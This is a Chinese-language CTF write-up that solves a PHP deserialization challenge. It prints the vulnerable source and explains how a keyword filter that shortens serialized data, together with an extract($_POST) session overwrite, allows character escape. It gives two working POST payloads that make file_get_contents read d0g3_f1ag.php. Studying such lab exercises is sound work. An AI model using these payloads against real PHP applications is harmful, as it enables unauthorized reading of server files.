前言
最近都沒刷題了,成懶狗了。。。
知識點
PHP反序列化逃逸
任何具有一定結構的數據,只要經過了某些處理而把自身結構改變,則可能會產生漏洞
關鍵詞數增加
例如: where->hacker,這樣詞數由五個增加到6個
關鍵詞數減少
例如:直接過濾掉一些關鍵詞
解題
打開題目有個鏈接,抓包有提示,直接訪問,發現源碼
<?php $function = @$_GET['f']; function filter($img){ $filter_arr = array('php','flag','php5','php4','fl1g'); $filter = '/'.implode('|',$filter_arr).'/i'; return preg_replace($filter,'',$img); } if($_SESSION){ unset($_SESSION); } $_SESSION["user"] = 'guest'; $_SESSION['function'] = $function; extract($_POST); if(!$function){ echo '<a href="index.php?f=highlight_file">source_code</a>'; } if(!$_GET['img_path']){ $_SESSION['img'] = base64_encode('guest_img.png'); }else{ $_SESSION['img'] = sha1(base64_encode($_GET['img_path'])); } $serialize_info = filter(serialize($_SESSION)); if($function == 'highlight_file'){ highlight_file('index.php'); }else if($function == 'phpinfo'){ eval('phpinfo();'); //maybe you can find something in here! }else if($function == 'show_image'){ $userinfo = unserialize($serialize_info); echo file_get_contents(base64_decode($userinfo['img'])); }
簡單分析,發現有個phpinfo,訪問一下,發現 d0g3_f1ag.php,讀取,將關鍵代碼放在一起
$function = @$_GET['f']; if($function == 'highlight_file'){ highlight_file('index.php'); }else if($function == 'phpinfo'){ eval('phpinfo();'); //maybe you can find something in here! }else if($function == 'show_image'){ $userinfo = unserialize($serialize_info); echo file_get_contents(base64_decode($userinfo['img'])); }
分析
根據上面可以清楚,f是我們用get方法傳參得到的變量並由$function接收。
$function發揮作用的代碼塊,在最下方的判斷句。
咱們初步訪問的時候f=highlight_file,
判斷句中給了提示,那麼f=phpinfo時,我們就看到了phpinfo的頁面,phpinfo有很多配置項會顯示。
我們發現了auto_append_file d0g3_f1ag.php 在頁面底部加載文件d0g3_f1ag.php。
所以可以猜測flag應該要從d0g3_f1ag.php拿。
當f=show_image是可以讀文件的,只要$userinfo[‘img’]是相應的flag.php的base64加密,所以我們先記住這個點,一會肯定要用
看最後的源碼有個高危函數file_get_contents
思路
雖然他會將一些關鍵詞置空,但是我們可以利用這一點造成字符逃逸,從而控制$userinfo["img"]
的值,達到任意文件讀取的效果**,雖然他沒有設置SESSION_START但是他用了extract($_POST);我們就可以通過發出POST請求來覆蓋SESSION**
將代碼複製測試
SESSION有個三個鍵分別爲user,function,img,控制img的值,就得放一個讓img變成base64加密後的d0g3_f1ag.php,因爲我們知道有過濾數組,我們就可以通過這個來吞掉後面的內容從而形成一個完整的序列化
鍵值逃逸 playload
_SESSION[user]=flagflagflagflagflagflag&_SESSION[function]=p";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";s:2:"ab";s:2:"sb";}
s:24 將";s:8:“function”;s:62:"p給吞掉了,而由於SESSION有三個鍵,所以需要在後面添加一個鍵(隨意)
鍵名逃逸payload
_SESSION[flagphp]=;s:2:"db";s:3:"img";s:20:"ZDBnM19mMWFnLnBocA==";}
同原理
參考鏈接
https://blog.csdn.net/weixin_43900387/article/details/105632663?utm_medium=distribute.pc_relevant.none-task-blog-baidujs-2